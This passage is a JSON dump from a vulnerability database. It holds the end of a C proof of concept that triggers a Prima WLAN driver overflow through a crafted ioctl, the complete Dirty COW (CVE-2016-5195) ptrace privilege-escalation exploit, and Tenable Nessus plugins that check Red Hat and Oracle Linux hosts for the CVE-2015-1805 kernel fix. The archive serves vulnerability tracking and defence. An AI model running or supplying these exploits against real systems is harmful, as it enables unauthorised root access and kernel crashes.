\nv_U8_t numParams; \nstruct PacketFilterParamsCfg \nparamsData[HDD_MAX_CMP_PER_PACKET_FILTER]; \n} tPacketFilterCfg, *tpPacketFilterCfg; \n \nint main(int argc, const char *argv[]) \n{ \nif (argc != 2) { \nfprintf(stderr, \"Bad usage\\n\"); \nfprintf(stderr, \"Usage: %s ifname\\n\", argv[0]); \nreturn -1; \n} \n \nstruct iwreq req; \nstrcpy(req.ifr_ifrn.ifrn_name, argv[1]); \nint fd, status, i = 0; \nfd = socket(AF_INET, SOCK_DGRAM, 0); \ntPacketFilterCfg p_req; \n \n/* crafting a data structure to triggering the code path */ \nreq.u.data.pointer = \nmalloc(sizeof(v_U8_t) * 3 + \nsizeof(struct PacketFilterParamsCfg) * 5); \np_req.filterAction = 1; \np_req.filterId = 0; \np_req.numParams = 3; \nfor (; i < 5; i++) { \np_req.paramsData[i].dataLength = 241; \nmemset(&p_req.paramsData[i].compareData, 0x41, 16); \n} \n \nmemcpy(req.u.data.pointer, &p_req, \nsizeof(v_U8_t) * 3 + \nsizeof(struct PacketFilterParamsCfg) * 5); \n \nif (ioctl(fd, 0x8bf7, &req) == -1) { \nfprintf(stderr, \"Failed ioct() get on interface %s: %s\\n\", \nargv[1], strerror(errno)); \n} else { \nprintf(\"You shouldn't see this msg...\\n\"); \n} \n \n} \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135372/linuxprimawlan-overflow.txt"}, {"lastseen": "2016-12-05T22:20:07", "description": "", "published": "2016-11-25T00:00:00", "type": "packetstorm", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-25T00:00:00", "id": "PACKETSTORM:139922", "href": "https://packetstormsecurity.com/files/139922/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceData": "`// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball \n#include <fcntl.h> //// pikachu \n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball \n#include <string.h> //// pokeball \n#include <stdio.h> //// (___) \n#include <stdint.h> //// (o o)_____/ \n#include <sys/mman.h> //// @@ ` \\ \n#include <sys/types.h> //// \\ ____, /miltank \n#include <sys/stat.h> //// // // \n#include <sys/wait.h> //// ^^ ^^ \n#include <sys/ptrace.h> //// mmap bc757000 \n#include <unistd.h> //// madvise 0 \n////////////////////////////////////////////// ptrace 0 \n////////////////////////////////////////////// miltank \n////////////////////////////////////////////// \nint f ;// file descriptor \nvoid *map ;// memory map \npid_t pid ;// process id \npthread_t pth ;// thread \nstruct stat st ;// file info \n////////////////////////////////////////////// \nvoid *madviseThread(void *arg) {// madvise thread \nint i,c=0 ;// counters \nfor(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 \nc+=madvise(map,100,MADV_DONTNEED) ;// race condition \nprintf(\"madvise %d\\n\\n\",c) ;// sum of errors \n}// /madvise thread \n////////////////////////////////////////////// \nint main(int argc,char *argv[]) {// entrypoint \nif(argc<3)return 1 ;// ./d file contents \nprintf(\"%s \\n\\ \n(___) \\n\\ \n(o o)_____/ \\n\\ \n@@ ` \\\\ \\n\\ \n\\\\ ____, /%s \\n\\ \n// // \\n\\ \n^^ ^^ \\n\\ \n\", argv[1], argv[2]) ;// dirty cow \nf=open(argv[1],O_RDONLY) ;// open read only file \nfstat(f,&st) ;// stat the fd \nmap=mmap(NULL ,// mmap the file \nst.st_size+sizeof(long) ,// size is filesize plus padding \nPROT_READ ,// read-only \nMAP_PRIVATE ,// private mapping for cow \nf ,// file descriptor \n0) ;// zero \nprintf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code \npid=fork() ;// fork process \nif(pid) {// if parent \nwaitpid(pid,NULL,0) ;// wait for child \nint u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) \nfor(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l \nfor(o=0;o<l;o++)//////////////////////// repeat for each byte \nfor(u=0;u<10000;u++)////////////////// try 10K times each time \nc+=ptrace(PTRACE_POKETEXT ,// inject into memory \npid ,// process id \nmap+o ,// address \n*((long*)(argv[2]+o))) ;// value \nprintf(\"ptrace %d\\n\\n\",c) ;// sum of error code \n}// otherwise \nelse {// child \npthread_create(&pth ,// create new thread \nNULL ,// null \nmadviseThread ,// run madviseThred \nNULL) ;// null \nptrace(PTRACE_TRACEME) ;// stat ptrace on child \nkill(getpid(),SIGSTOP) ;// signal parent \npthread_join(pth,NULL) ;// wait for thread \n}// / child \nreturn 0 ;// return \n}// / entrypoint \n////////////////////////////////////////////// \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139922/dirtycowptrace-escalate.txt"}], "nessus": [{"lastseen": "2021-02-01T05:32:07", "description": "Updated kernel packages that fix one security issue and one bug are\nnow available for Red Hat Enterprise Linux 5.9 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug :\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could confuse the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1214239)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 30, "published": "2015-06-17T00:00:00", "title": "RHEL 5 : kernel (RHSA-2015:1120)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2015-1120.NASL", "href": "https://www.tenable.com/plugins/nessus/84225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1120. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84225);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_xref(name:\"RHSA\", value:\"2015:1120\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2015:1120)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue and one bug are\nnow available for Red Hat Enterprise Linux 5.9 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug :\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could confuse the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1214239)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1805\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5\\.9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.9\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1120\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-PAE-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-debuginfo-common-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"kernel-doc-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-348.31.2.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-348.31.2.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:56", "description": "From Red Hat Security Advisory 2015:1042 :\n\nUpdated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. (BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 27, "published": "2015-06-04T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2015-1042)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "modified": "2015-06-04T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2015-1042.NASL", "href": "https://www.tenable.com/plugins/nessus/83985", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1042 and \n# Oracle Linux Security Advisory ELSA-2015-1042 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83985);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-1805\");\n script_bugtraq_id(74951);\n script_xref(name:\"RHSA\", value:\"2015:1042\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2015-1042)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1042 :\n\nUpdated kernel packages that fix one security issue and several bugs\nare now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe\nread and write functionality did not take into account the I/O vectors\nthat were already processed when retrying after a failed atomic access\noperation, potentially resulting in memory corruption due to an I/O\nvector array overrun. A local, unprivileged user could use this flaw\nto crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2015-1805, Important)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs :\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi\ncommand timeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing.\n(BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in\nthe shrink_zone() function even though the vm.max_reclaims_in_progress\nfeature was set to 1. This update provides a patch fixing the\nunderlying source code, and spinlock contention no longer occurs in\nthis scenario. (BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from\nit, failed to reset the retransmission timestamp. As a consequence, on\ncertain connections, if a packet had to be re-transmitted, the\nretrans_stamp variable was only cleared when the next acked packet was\nreceived. This could lead to an early abortion of the TCP connection\nif this next packet also got lost. With this update, the socket clears\nretrans_stamp when the recovery is completed, thus fixing the bug.\n(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU\nflag, which could cause problems in the switch_to() function and lead\nto floating-point unit (FPU) corruption. With this update, TS_USEDFPU\nis cleared as expected, and FPU is no longer under threat of\ncorruption. (BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and\nthe kernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red\nHat Enterprise Linux 5 Virtual Machine (VM). With this update, the new\nsize is now reflected online immediately in a Red Hat Enterprise Linux\n5 VM so it is no longer necessary to reboot the VM to see the new disk\nsize. (BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005097.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-1805\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2015-1042\");\n }\n else\n {\n __rpm_report = 